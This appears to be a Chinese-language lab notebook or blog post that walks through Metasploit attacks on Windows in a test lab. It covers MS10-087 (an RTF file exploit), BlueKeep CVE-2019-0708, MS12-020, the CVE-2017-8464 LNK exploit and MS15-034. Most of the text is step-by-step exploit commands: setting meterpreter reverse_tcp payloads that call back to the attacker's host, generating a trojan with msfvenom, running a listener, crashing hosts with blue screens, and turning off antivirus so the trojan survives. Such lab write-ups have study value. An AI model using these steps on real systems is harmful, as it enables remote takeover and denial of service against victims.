注意:所有攻击前先要管防火墙!
msf 之ms10-087
输入命令
- search ms10-087;
- 使用这个模块:
Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
image.png
看到一个文件
改文件名
image.png
软件捆绑,设置payload: set payload windows/exec
image.png
调用cmd中的计算器
image.png
我们运行下,文件已经在这个路径下面了。
image.png
kail下面root文件显示隐藏文件✔
image.png
image.png
root下→.msf4→local→pjy的木马文件放到桌面
image.png
把木马放到winxp中 点rtf文件计算器打开
踩坑:复制的xp环境要重启一下才可以执行!!
image.png
msfCVE-2019-0708实例
-
为实验成功先win7系统下关闭防火墙并开启3389端口
image.png
image.png
-
如下命令操作
search 2019-0708
use 1
show options(查看使用说明)
set rdp_client_ip 192.168.117 (设置当前ip是被攻击的主机ip)
image.png
image.png
show options
set payload windows/x64/meterpreter/reverse_tcp #设置反向链接
image.png
set lhost 192.168.1.119
set id 4
image.png
exploit
set rhosts 192.168.1.117 (设置被攻击主机号)
exploit
check
set target 1
exploit (目标会蓝屏)成功导致被攻击的主机蓝屏
image.png
msfCVE-2019-0708实例
- 先开启远程3389端口然后开始做攻击实验
命令如下:
ms12-020
search ms12-020
use 0
set rhosts 192.168.1.124 (攻击2003系统)
exploit(蓝屏)
image.png
震网三代
-
漏洞详情
北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).
CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。
CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
攻击机:kali
IP地址为:192.168.10.118
靶机:win7
IP地址:192.168.10.119
受影响的版本
Windows 7
Windows 8.1
Windows RT 8.1
Windows 10
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016 -
ms 2017_8464
search 2017_8464
use 0
show options
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.1.117
run/exploit
生成很多快捷方式,找到快捷方式可以存到U盘,可以单独拷贝出来有漏洞。
image.png
image.png
- kail木马生成使用
命令如下:
kail下操作
kail:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=4444 -f exe -o payload.exe(生成木马)
image.png
kail:sz payload.exe 下载木马到桌面,此处踩坑——木马被查杀。
注意!踩坑:
尽管关闭了防火墙,但是生成的木马病毒被win10系统自带的查杀病毒给消灭了,关闭方式如下。
image.png
image.png
image.png
image.png
进入到msf下,
1.开启监听444端口:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.119
set lport 4444
exploit
当win7下点击木马,就可以监听运行
image.png
ms15-034
(windows2008系统下运行)
现在windows sever 2008 r2 系统下安装iis 方法参考
[win2008系统创建iis流程]https://www.jianshu.com/p/44c503ed447d
image.png
ms15-034
search ms15-034
use 0
set rhosts 192.168.1.4(win2008系统ip) 出现蓝屏重启
操作如下:
设置iis
image.png
更改为ip自动获取
image.png
image.png
网友评论